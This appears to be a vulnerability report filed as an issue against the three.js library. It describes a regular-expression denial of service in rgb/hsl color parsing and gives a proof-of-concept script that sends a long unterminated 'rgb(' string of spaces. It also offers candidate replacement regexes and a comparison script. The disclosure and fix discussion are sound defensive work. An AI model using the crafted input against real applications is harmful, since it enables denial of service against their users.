Closed
Description
Hi,
I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in three.
It can cause a denial of service when handling rgb or hsl colors.
The vulnerable regex is located in Line 166 in 2d04b4b:

```js
if ( m = /^((?:rgb|hsl)a?)\(\s*([^\)]*)\)/.exec( style ) ) {
```
To Reproduce
Steps to reproduce the behavior:
Code

```js
var three = require('three')

// Build an unterminated color string: "rgb(" followed by n spaces.
function build_blank (n) {
  var ret = "rgb("
  for (var i = 0; i < n; i++) {
    ret += " "
  }
  return ret
}

var Color = three.Color
var time = Date.now();
new Color(build_blank(50000))
var time_cost = Date.now() - time;
console.log(time_cost + " ms")
```

I am willing to suggest that you replace the regex `/^((?:rgb|hsl)a?)\(\s*([^\)]*)\)/` with `/^((?:rgb|hsl)a?)\(\s*([^\)\s]*)\)/`
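The check below is an added example, not code from the issue or from three.js: it runs the reported pattern, the proposed replacement, and a third pattern (an assumption of mine, not from the page, that simply drops the leading `\s*` so only one quantifier can consume spaces) against a constructed set of valid color strings and against the blank input from the report, so a reviewer can see which candidate still accepts valid input before measuring how it behaves on the failing case.

```javascript
// Added example (not from the issue or from three.js). No dependency on three.
const ORIGINAL = /^((?:rgb|hsl)a?)\(\s*([^\)]*)\)/;
const PROPOSED = /^((?:rgb|hsl)a?)\(\s*([^\)\s]*)\)/;
// Assumption, not a pattern from the page: without the leading \s*, the
// \s* and [^\)]* quantifiers no longer compete for the same spaces, so a
// failed match backtracks linearly instead of quadratically. The second
// group may then start with whitespace, so the caller trims it.
const NO_OVERLAP = /^((?:rgb|hsl)a?)\(([^\)]*)\)/;

// Constructed sample of valid CSS-style color strings.
const VALID = [
  'rgb(255,0,0)',
  'rgb(255, 0, 0)',
  'rgba( 255 , 0 , 0 , 0.5 )',
  'hsl(120, 50%, 50%)',
];

// Return the function name and trimmed component string, or null.
function parseCall(re, style) {
  const m = re.exec(style);
  return m ? { name: m[1], components: m[2].trim() } : null;
}

// Which of the valid samples does a pattern fail to match?
function rejectedValid(re) {
  return VALID.filter((s) => parseCall(re, s) === null);
}

// The unterminated input from the report: "rgb(" followed by n spaces.
function buildBlank(n) {
  return 'rgb(' + ' '.repeat(n);
}

// Whether the pattern matched the blank input and how long it took (ms).
function timeFail(re, n) {
  const input = buildBlank(n);
  const t = Date.now();
  const m = re.exec(input);
  return { matched: m !== null, ms: Date.now() - t };
}

// n is kept small here so the quadratic case still finishes promptly.
const CANDIDATES = [['original', ORIGINAL], ['proposed', PROPOSED], ['no-overlap', NO_OVERLAP]];
for (const [label, re] of CANDIDATES) {
  console.log(label, 'rejects valid:', rejectedValid(re), 'blank:', timeFail(re, 5000));
}
```

Running it shows the proposed pattern rejects every valid sample that contains a space after a comma, while the original and the no-overlap pattern accept all four; raise `n` to compare the failing-case timings.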